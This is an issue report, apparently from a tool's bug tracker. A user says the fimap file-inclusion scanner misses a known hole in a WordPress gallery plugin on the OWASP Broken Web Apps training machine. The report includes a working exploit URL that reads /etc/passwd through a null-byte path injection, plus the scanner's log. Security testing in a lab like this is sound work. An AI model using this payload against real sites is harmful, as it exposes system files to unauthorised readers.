I'm trying out your tool fimap and I'm trying it against a vulnerable Wordpress
plugin on the OWASP Broken Web Apps virtual machine:
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
The plugin can be exploited with
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrow
ser.php?myPath=/etc/passwd%00
However, fimap does not discover this:
root@bt:~/fimap_alpha_v09# ./fimap.py -u
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL:
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'
[19:36:02] [OUT] Inspecting URL
'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybro
wser.php?myPath=test'...
[19:36:02] [INFO] Fiddling around with URL...
[19:36:02] [WARN] HTTP Error 500: Internal Server Error
Target URL isn't affected by any file inclusion bug :(
Running fimap on Backtrack 5.
Original issue reported on code.google.com by
treh...@gmail.comon 13 Jan 2012 at 10:17